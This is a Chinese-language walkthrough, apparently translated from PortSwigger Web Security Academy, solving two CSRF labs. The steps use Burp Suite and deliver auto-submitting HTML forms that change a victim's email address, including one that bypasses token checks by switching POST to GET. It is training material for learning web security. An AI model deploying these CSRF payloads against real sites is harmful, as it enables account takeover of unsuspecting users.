没有防御措施的 CSRF 漏洞
lab
实验室:没有防御措施的 CSRF 漏洞 |网络安全学院 (portswigger.net)
solve
- 打开 Burp 的浏览器并登录您的帐户。提交“更新电子邮件”表单,并在您的代理历史记录中找到生成的请求。
如果您使用的是 Burp Suite Professional,请右键单击请求并选择参与工具/生成 CSRF PoC。启用包含自动提交脚本的选项,然后单击“重新生成”。
或者,如果您使用的是 Burp Suite Community Edition,请使用以下 HTML 模板。您可以通过右键单击并选择“复制 URL”来获取请求 URL。
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
- 转到漏洞利用服务器,将您的漏洞利用 HTML 粘贴到“正文”部分,然后单击“存储”。
- 要验证漏洞是否有效,请单击“查看漏洞”自行尝试,然后检查生成的 HTTP 请求和响应。
- 更改漏洞利用中的电子邮件地址,使其与您自己的电子邮件地址不匹配。
- 点击“交付给受害者”以解决实验室问题。
令牌验证取决于请求方法的 CSRF
lab
实验室:令牌验证取决于请求方法的 CSRF |网络安全学院 (portswigger.net)
solve
- 打开 Burp 的浏览器并登录您的帐户。提交“更新电子邮件”表单,并在您的代理历史记录中找到生成的请求。
- 将请求发送到 Burp Repeater,并观察如果更改参数的值,则请求将被拒绝。
csrf
- 使用上下文菜单上的“更改请求方法”将其转换为 GET 请求,并观察 CSRF 令牌不再被验证。
如果您使用的是 Burp Suite Professional,请右键单击请求,然后从上下文菜单中选择“参与工具”/“生成 CSRF PoC”。启用包含自动提交脚本的选项,然后单击“重新生成”。
或者,如果您使用的是 Burp Suite Community Edition,请使用以下 HTML 模板。您可以通过右键单击并选择“复制 URL”来获取请求 URL。
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
- 转到漏洞利用服务器,将您的漏洞利用 HTML 粘贴到“正文”部分,然后单击“存储”。
- 要验证漏洞是否有效,请单击“查看漏洞”并检查生成的 HTTP 请求和响应,自行尝试。
- 更改漏洞利用中的电子邮件地址,使其与您自己的电子邮件地址不匹配。
- 存储漏洞,然后单击“交付给受害者”以解决实验室问题。
评论0
暂时没有评论